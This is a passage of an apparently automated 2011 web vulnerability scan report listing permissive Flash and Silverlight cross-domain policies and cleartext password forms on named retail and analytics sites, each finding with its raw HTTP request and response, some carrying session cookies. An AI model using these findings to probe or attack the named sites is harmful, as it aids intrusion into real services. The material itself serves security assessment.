Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:17:47 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.85. http://www.res-x.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

6.86. http://www.helzberg.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helzberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:53:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

6.87. https://www.helzberg.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:12 GMT
Content-Length: 506
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

7. Silverlight cross-domain policy
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:12 GMT
Server: Omniture DC/2.0.0
xserver: www388
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www438
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Omniture DC/2.0.0
xserver: www321
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.7. http://metrics.ftd.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:38 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.8. http://metrics.gnc.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:44 GMT
Server: Omniture DC/2.0.0
xserver: www344
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www30
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www637
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www9
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://shoprunner.force.com/content/JsContentElementsGNC

Summary

Severity:   High
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.2. http://shoprunner.force.com/content/JsContentElementsPET

Summary

Severity:   High
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.3. http://www.ftd.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.5. http://www.petco.com/Secure/Login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petco.com
Path:   /Secure/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
